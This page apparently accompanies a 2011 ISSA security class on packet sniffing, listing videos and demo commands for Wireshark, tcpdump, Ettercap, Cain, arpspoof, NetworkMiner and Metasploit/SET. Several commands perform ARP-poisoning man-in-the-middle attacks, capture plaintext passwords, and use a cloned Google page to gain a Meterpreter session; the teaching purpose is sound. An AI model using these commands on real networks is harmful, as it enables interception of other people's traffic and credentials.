Network Sniffers Class for the Kentuckiana ISSA 2011

This time Gary Hampton joins me to impart his knowledge of using Wireshark to diagnose problems on wireless networks. I cover the usual suspects:  TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMinor, Firesheep and Xplico. I lost part of Gary's on screen demo when my recording rig froze up, and I apparently did not make a proper sacrifice to the demo gods for my section when I tried to show off Ettercap filters, but I hope you still find it informative.


Part 1: Intro to Sniffers


Sniffers Class Part 1 from Adrian Crenshaw on Vimeo.

Download: http://www.archive.org/download/IssaSniffersClass/sniffers1.avi

Part 2: Wireshark and Wireless with Gary Hampton

Sniffers Class Part 2 from Adrian Crenshaw on Vimeo.


Download: http://www.archive.org/download/IssaSniffersClass/sniffers2.avi

Part 3: A little more Wireshark, TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMinor, Firesheep, Xplico and bridging.


Sniffers Class Part 3 from Adrian Crenshaw on Vimeo.

Commands used:

Wireshark Demo   1.       Run Wireshark 2.       Basic start capture 3.       Start capture with options 4.       Drill down OSI 5.       Capture filter options (4.9 in book) not tcp port 3389 not broadcast and not multicast 6.       Show a packet 7.       Pop a packet out 8.       Sort by columns 9.       Follow stream (web traffic) 10.    Export HTTP Objects 11.    Simple view filters tcp.port == 80 !(ip.addr == 192.168.1.13) 12.    Filter builder 13.    Apply filters from different panes (packet vs. details panes). 14.    Save filters 15.     Open a Wiki page 16.    Edit-> Find packet 17.    Analyzers ->Expert Info 18.    Analyzers ->Firewall ACLs 19.    Stats 20.    Color rules 21.    Save capture 22.    Mention Lua Dumpcap/TCPDump     dumpcap –D     dumpcap -i eth0 -s 0 -f "port 80" -w webtraffic.pcap Sniffing in Monitor mode    ifconfig wlan0 down    iwconfig wlan0 mode monitor    iwconfig wlan0 channel 1    ifconfig wlan0 up Ettercap Demo 1.      ettercap -T –q –i eth0 -M ARP // // 2.      ettercap -T –q –i eth0 -M ARP // /10.1.1.1/ 3.      Show ARP traffic 4.      Telnet to 10.1.1.1 5.      http to 10.1.1.1 6.      FTP/Telnet/HTTP someplace with a password 7.      Show find sniffers ettercap –G ettercap –T –I eth0 –P list ettercap –T –I eth0 –P search_promisc  // 8.      Filters:      etterfilter ig.filter -o ig.ef      ettercap -T -q -F ig.ef -M ARP // // 9.      Mention MITM: icmp, dhcp, port filters 10.    driftnet -i eth0 11.    Etherape

Cain Demo 1.      Start poisoning 2.      Telnet to 10.1.1.1 3.      http to 10.1.1.1 4.      FTP/Telnet/HTTP someplace with a password 5.      SSL someplace from VM 6.      Sniff RDP ARPSpoof Demo    cat /proc/sys/net/ipv4/ip_forward    echo 1 > /proc/sys/net/ipv4/ip_forward    arpspoof -i eth0 10.0.0.1    arpspoof -i eth0 -t 10.0.0.113 10.0.0.1    dsniff –I eth0 -c NetworkMiner 1.      TCP fingerprinting 2.      Host details 3.      DHCP finger printing 4.      File capture 5.      Passwords 6.      Plaintext 7.      Open pcap Bridging in Linux setup     sudo apt-get install bridge-utils    Script to setup MAC bridging:     ifconfig eth0 0.0.0.0     ifconfig eth1 0.0.0.0     brctl addbr mybridge     brctl addif mybridge eth0     brctl addif mybridge eth1     ifconfig mybridge up Things to show while bridged     ifconfig     sudo tcpdump -i mybridge -s 0 -w out.cap     sudo etherape -i mybridge     sudo driftnet -i mybridge Metasploit/SET    Backtrack->Penetration->SET    Menu Choices 2, 1, 2 (Google.com), 2, 2, default, no    <go to page>    sessions -i 1    use sniffer    help    sniffer_interfaces    sniffer_start 2    sniffer_dump 2 /tmp/all.cap    <Show in Wireshark>